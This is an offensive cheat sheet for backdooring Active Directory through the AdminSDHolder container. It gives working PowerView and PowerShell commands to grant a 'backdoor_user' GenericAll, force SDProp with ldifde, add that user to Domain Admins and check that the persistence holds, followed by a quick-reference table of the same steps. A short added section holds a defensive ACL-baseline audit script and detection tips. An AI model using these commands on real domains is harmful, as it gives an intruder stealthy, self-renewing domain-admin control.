
Overview

AdminSDHolder is a container whose ACL is copied to all protected objects (Domain Admins, Enterprise Admins, etc.) every 60 minutes by the SDProp process. Modify the AdminSDHolder ACL → persistent access to protected groups.

Protected Groups

  • Domain Admins
  • Enterprise Admins
  • Schema Admins
  • Administrators
  • Account Operators
  • Backup Operators
  • Server Operators
  • Domain Controllers
  • krbtgt

Add Backdoor ACE

PowerView

Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights All

AD Module

# Requires the RSAT ActiveDirectory module (provides Get-ADUser and the AD: PSDrive)
Import-Module ActiveDirectory
$sid = (Get-ADUser backdoor_user).SID
$path = "AD:\CN=AdminSDHolder,CN=System,DC=domain,DC=local"
$acl = Get-Acl -Path $path
# GenericAll for backdoor_user; SDProp copies this ACE onto every protected object
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($ace)
Set-Acl -Path $path -AclObject $acl

Wait for SDProp (or Force)

SDProp runs every 60 minutes by default. Force it with the Invoke-ADSDPropagation script (a community script, not an AD module cmdlet):
Invoke-ADSDPropagation
Or trigger it manually by writing runProtectAdminGroupsTask to the rootDSE:
# Run as SYSTEM on a DC; save the LDIF below as sdprop.ldf, then import it
ldifde -i -f sdprop.ldf

# sdprop.ldf (an empty dn targets the rootDSE)
dn:
changetype: modify
replace: runProtectAdminGroupsTask
runProtectAdminGroupsTask: 1
-

After SDProp Runs

backdoor_user now has GenericAll on Domain Admins, Enterprise Admins, etc.
# Add yourself to Domain Admins
Add-DomainGroupMember -Identity "Domain Admins" -Members backdoor_user
Even if backdoor_user is removed from the group, the ACE persists and is re-applied on the next SDProp cycle.

Verify

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.IdentityReference -match "backdoor_user"}

Notes

  • Very persistent: the ACL is rewritten every 60 min
  • Removing the ACE from AdminSDHolder removes the persistence
  • Detection: monitor AdminSDHolder ACL changes
  • Requires Domain Admin rights to set initially
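As an added defensive check (not from the original page): a PowerShell audit that snapshots the AdminSDHolder DACL as SDDL and reports every ACE added or removed since that baseline, resolving the trustee SID. It assumes the RSAT ActiveDirectory module on a domain-joined host; the baseline file path is a constructed placeholder.

```powershell
# Added defensive audit, not part of the original page. Assumes the RSAT
# ActiveDirectory module on a domain-joined host; the baseline file path is
# a constructed placeholder.
Import-Module ActiveDirectory

function Get-AdminSDHolderSddl {
    $dn = "CN=AdminSDHolder,CN=System," + (Get-ADDomain).DistinguishedName
    (Get-Acl -Path ("AD:\" + $dn)).Sddl
}

# Resolve a SID string to DOMAIN\name where possible; otherwise return it as-is
# (SDDL may also use two-letter aliases such as DA or SY, which stay as-is).
function Resolve-SidLabel([string]$Sid) {
    try {
        $id = New-Object System.Security.Principal.SecurityIdentifier $Sid
        $id.Translate([System.Security.Principal.NTAccount]).Value
    } catch { $Sid }
}

# Compare the live DACL with a saved known-good SDDL and report every ACE that
# was added or removed. Create the baseline while the ACL is trusted.
function Compare-AdminSDHolderBaseline([string]$BaselinePath = "C:\Baseline\AdminSDHolder.sddl") {
    $current = Get-AdminSDHolderSddl
    if (-not (Test-Path $BaselinePath)) {
        Set-Content -Path $BaselinePath -Value $current
        return "Baseline written to $BaselinePath"
    }
    $baseline = (Get-Content -Path $BaselinePath -Raw).Trim()
    # Each SDDL ACE looks like (A;;GA;;;S-1-5-21-...); split both strings into sets.
    $aceRegex = '\([^()]*\)'
    $curAces  = @([regex]::Matches($current,  $aceRegex) | ForEach-Object { $_.Value })
    $baseAces = @([regex]::Matches($baseline, $aceRegex) | ForEach-Object { $_.Value })
    $added   = $curAces  | Where-Object { $baseAces -notcontains $_ }
    $removed = $baseAces | Where-Object { $curAces  -notcontains $_ }
    foreach ($ace in $added) {
        # Fields: type;flags;rights;object_guid;inherit_guid;trustee
        $f = $ace.TrimStart('(').TrimEnd(')').Split(';')
        [pscustomobject]@{ Change = 'Added'; Rights = $f[2]; Trustee = (Resolve-SidLabel $f[5]); Ace = $ace }
    }
    foreach ($ace in $removed) {
        [pscustomobject]@{ Change = 'Removed'; Rights = ''; Trustee = ''; Ace = $ace }
    }
}

Compare-AdminSDHolderBaseline | Format-Table -AutoSize
```

Run it once while the ACL is known-good to write the baseline, then on a schedule; pair it with audit event 5136 (directory service object modified) on the AdminSDHolder object to catch the write itself.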

Quick Reference

Task          Command
Add ACE       Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity user -Rights All
Force SDProp  Invoke-ADSDPropagation
Verify        Check ACL on "Domain Admins" for backdoor user
Remove        Delete ACE from AdminSDHolder